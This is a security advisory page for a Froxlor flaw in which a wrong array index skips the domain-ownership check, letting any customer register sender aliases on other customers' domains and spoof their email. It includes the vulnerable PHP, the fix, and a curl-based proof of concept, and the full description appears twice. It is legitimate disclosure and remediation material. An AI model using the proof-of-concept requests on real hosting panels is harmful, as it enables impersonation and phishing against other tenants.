Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
5.0
Froxlor Allows Cross-Customer Email Spoofing
GHSA-vmjj-qr7v-pxm6
Summary
Froxlor, a web hosting control panel, has a security flaw that lets one customer send emails as another customer's email addresses. This happens when a customer adds a full email address as an allowed sender, bypassing domain ownership checks. To fix this, update Froxlor to ensure it correctly checks the email domain when adding sender aliases.
What to do
- Update froxlor froxlor/froxlor to version 2.3.6.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| Packagist | froxlor | froxlor/froxlor |
< 2.3.6 Fix: upgrade to 2.3.6
|
Original title
Froxlor has an Email Sender Alias Domain Ownership Bypass via Wrong Array Index Allows Cross-Customer Email Spoofing
Original description
## Summary
In `EmailSender::add()`, the domain ownership validation for full email sender aliases uses the wrong array index when splitting the email address, passing the local part instead of the domain to `validateLocalDomainOwnership()`. This causes the ownership check to always pass for non-existent "domains," allowing any authenticated customer to add sender aliases for email addresses on domains belonging to other customers. Postfix's `sender_login_maps` then authorizes the attacker to send emails as those addresses.
## Details
In `lib/Froxlor/Api/Commands/EmailSender.php` at line 100, when a customer adds a full email address (not a `@domain` wildcard) as an allowed sender, the code splits on `@` and takes index `[0]`:
```php
// Line 96-106
if (substr($allowed_sender, 0, 1) != '@') {
if (!Validate::validateEmail($idna_convert->encode($allowed_sender))) {
Response::standardError('emailiswrong', $allowed_sender, true);
}
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[0] ?? ""); // BUG: [0] is the local part
} else {
if (!Validate::validateDomain($idna_convert->encode(substr($allowed_sender, 1)))) {
Response::standardError('wildcardemailiswrong', substr($allowed_sender, 1), true);
}
self::validateLocalDomainOwnership(substr($allowed_sender, 1)); // CORRECT: passes domain
}
```
For input `[email protected]`, `explode("@", "[email protected]")` returns `["admin", "domain-b.com"]`. Index `[0]` is `"admin"` — the local part, not the domain.
The `validateLocalDomainOwnership()` function (lines 346-355) then queries `panel_domains` for a domain matching `"admin"`:
```php
private static function validateLocalDomainOwnership(string $domain): void
{
$sel_stmt = Database::prepare("SELECT customerid FROM `" . TABLE_PANEL_DOMAINS . "` WHERE `domain` = :domain");
$domain_result = Database::pexecute_first($sel_stmt, ['domain' => $domain]);
if ($domain_result && $domain_result['customerid'] != CurrentUser::getField('customerid')) {
Response::standardError('senderdomainnotowned', $domain, true);
}
}
```
Since no domain named `"admin"` exists in `panel_domains`, `$domain_result` is false, and the function returns without error — the ownership check silently passes.
The inserted `mail_sender_aliases` row is then picked up by Postfix's `sender_login_maps` query (configured in `mysql-virtual_sender_permissions.cf`):
```sql
... UNION (SELECT mail_sender_aliases.email FROM mail_sender_aliases
WHERE mail_sender_aliases.allowed_sender = '%s') ...
```
This query maps the `allowed_sender` back to the mail user, authorizing them to send as that address via SMTP.
## PoC
```bash
# Prerequisites: Froxlor instance with mail.enable_allow_sender enabled,
# two customers: Customer A (owns domain-a.com) and Customer B (owns domain-b.com)
# Step 1: As Customer A, add a sender alias claiming Customer B's domain
# Via API:
curl -X POST 'https://froxlor-host/api/v1/' \
-H 'Authorization: Basic <customer-A-credentials>' \
-H 'Content-Type: application/json' \
-d '{
"command": "EmailSender.add",
"params": {
"emailaddr": "[email protected]",
"allowed_sender": "[email protected]"
}
}'
# Expected: Error "senderdomainnotowned" because domain-b.com belongs to Customer B
# Actual: 200 OK — alias is created because validateLocalDomainOwnership
# receives "ceo" (local part) instead of "domain-b.com" (domain)
# Step 2: Verify the alias was inserted
curl -X POST 'https://froxlor-host/api/v1/' \
-H 'Authorization: Basic <customer-A-credentials>' \
-H 'Content-Type: application/json' \
-d '{
"command": "EmailSender.listing",
"params": {"emailaddr": "[email protected]"}
}'
# Step 3: Customer A can now send email as [email protected] via SMTP
# because Postfix sender_login_maps will match the mail_sender_aliases entry
# and authorize Customer A's mail account to use that sender address.
```
The same attack works via the web UI by POST-ing to `customer_email.php` with `action=add_sender` and the target domain in `allowed_domain`.
## Impact
Any authenticated customer on a multi-tenant Froxlor instance can add sender aliases for email addresses on domains belonging to other customers. This allows:
- **Cross-customer email spoofing**: Send emails impersonating users on other customers' domains, bypassing Postfix's `smtpd_sender_login_maps` restriction that is specifically designed to prevent this.
- **Multi-tenant isolation breach**: The domain ownership check (`validateLocalDomainOwnership`) is the only barrier preventing cross-customer sender aliasing, and it is completely ineffective for full email addresses.
- **Phishing and reputation damage**: Spoofed emails originate from the legitimate mail server, passing SPF/DKIM checks for the target domain if those records point to the Froxlor server.
Note: The wildcard (`@domain`) code path at line 105 is **not** affected — it correctly passes the domain to `validateLocalDomainOwnership()`.
## Recommended Fix
Change index `[0]` to `[1]` on line 100 of `lib/Froxlor/Api/Commands/EmailSender.php`:
```php
// Before (line 100):
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[0] ?? "");
// After:
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[1] ?? "");
```
This ensures the domain part of the email address is passed to the ownership validation, matching the behavior of the wildcard path on line 105.
In `EmailSender::add()`, the domain ownership validation for full email sender aliases uses the wrong array index when splitting the email address, passing the local part instead of the domain to `validateLocalDomainOwnership()`. This causes the ownership check to always pass for non-existent "domains," allowing any authenticated customer to add sender aliases for email addresses on domains belonging to other customers. Postfix's `sender_login_maps` then authorizes the attacker to send emails as those addresses.
## Details
In `lib/Froxlor/Api/Commands/EmailSender.php` at line 100, when a customer adds a full email address (not a `@domain` wildcard) as an allowed sender, the code splits on `@` and takes index `[0]`:
```php
// Line 96-106
if (substr($allowed_sender, 0, 1) != '@') {
if (!Validate::validateEmail($idna_convert->encode($allowed_sender))) {
Response::standardError('emailiswrong', $allowed_sender, true);
}
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[0] ?? ""); // BUG: [0] is the local part
} else {
if (!Validate::validateDomain($idna_convert->encode(substr($allowed_sender, 1)))) {
Response::standardError('wildcardemailiswrong', substr($allowed_sender, 1), true);
}
self::validateLocalDomainOwnership(substr($allowed_sender, 1)); // CORRECT: passes domain
}
```
For input `[email protected]`, `explode("@", "[email protected]")` returns `["admin", "domain-b.com"]`. Index `[0]` is `"admin"` — the local part, not the domain.
The `validateLocalDomainOwnership()` function (lines 346-355) then queries `panel_domains` for a domain matching `"admin"`:
```php
private static function validateLocalDomainOwnership(string $domain): void
{
$sel_stmt = Database::prepare("SELECT customerid FROM `" . TABLE_PANEL_DOMAINS . "` WHERE `domain` = :domain");
$domain_result = Database::pexecute_first($sel_stmt, ['domain' => $domain]);
if ($domain_result && $domain_result['customerid'] != CurrentUser::getField('customerid')) {
Response::standardError('senderdomainnotowned', $domain, true);
}
}
```
Since no domain named `"admin"` exists in `panel_domains`, `$domain_result` is false, and the function returns without error — the ownership check silently passes.
The inserted `mail_sender_aliases` row is then picked up by Postfix's `sender_login_maps` query (configured in `mysql-virtual_sender_permissions.cf`):
```sql
... UNION (SELECT mail_sender_aliases.email FROM mail_sender_aliases
WHERE mail_sender_aliases.allowed_sender = '%s') ...
```
This query maps the `allowed_sender` back to the mail user, authorizing them to send as that address via SMTP.
## PoC
```bash
# Prerequisites: Froxlor instance with mail.enable_allow_sender enabled,
# two customers: Customer A (owns domain-a.com) and Customer B (owns domain-b.com)
# Step 1: As Customer A, add a sender alias claiming Customer B's domain
# Via API:
curl -X POST 'https://froxlor-host/api/v1/' \
-H 'Authorization: Basic <customer-A-credentials>' \
-H 'Content-Type: application/json' \
-d '{
"command": "EmailSender.add",
"params": {
"emailaddr": "[email protected]",
"allowed_sender": "[email protected]"
}
}'
# Expected: Error "senderdomainnotowned" because domain-b.com belongs to Customer B
# Actual: 200 OK — alias is created because validateLocalDomainOwnership
# receives "ceo" (local part) instead of "domain-b.com" (domain)
# Step 2: Verify the alias was inserted
curl -X POST 'https://froxlor-host/api/v1/' \
-H 'Authorization: Basic <customer-A-credentials>' \
-H 'Content-Type: application/json' \
-d '{
"command": "EmailSender.listing",
"params": {"emailaddr": "[email protected]"}
}'
# Step 3: Customer A can now send email as [email protected] via SMTP
# because Postfix sender_login_maps will match the mail_sender_aliases entry
# and authorize Customer A's mail account to use that sender address.
```
The same attack works via the web UI by POST-ing to `customer_email.php` with `action=add_sender` and the target domain in `allowed_domain`.
## Impact
Any authenticated customer on a multi-tenant Froxlor instance can add sender aliases for email addresses on domains belonging to other customers. This allows:
- **Cross-customer email spoofing**: Send emails impersonating users on other customers' domains, bypassing Postfix's `smtpd_sender_login_maps` restriction that is specifically designed to prevent this.
- **Multi-tenant isolation breach**: The domain ownership check (`validateLocalDomainOwnership`) is the only barrier preventing cross-customer sender aliasing, and it is completely ineffective for full email addresses.
- **Phishing and reputation damage**: Spoofed emails originate from the legitimate mail server, passing SPF/DKIM checks for the target domain if those records point to the Froxlor server.
Note: The wildcard (`@domain`) code path at line 105 is **not** affected — it correctly passes the domain to `validateLocalDomainOwnership()`.
## Recommended Fix
Change index `[0]` to `[1]` on line 100 of `lib/Froxlor/Api/Commands/EmailSender.php`:
```php
// Before (line 100):
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[0] ?? "");
// After:
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[1] ?? "");
```
This ensures the domain part of the email address is passed to the ownership validation, matching the behavior of the wildcard path on line 105.
osv CVSS3.1
5.0
Vulnerability type
CWE-863
Incorrect Authorization
Published: 16 Apr 2026 · Updated: 16 Apr 2026 · First seen: 16 Apr 2026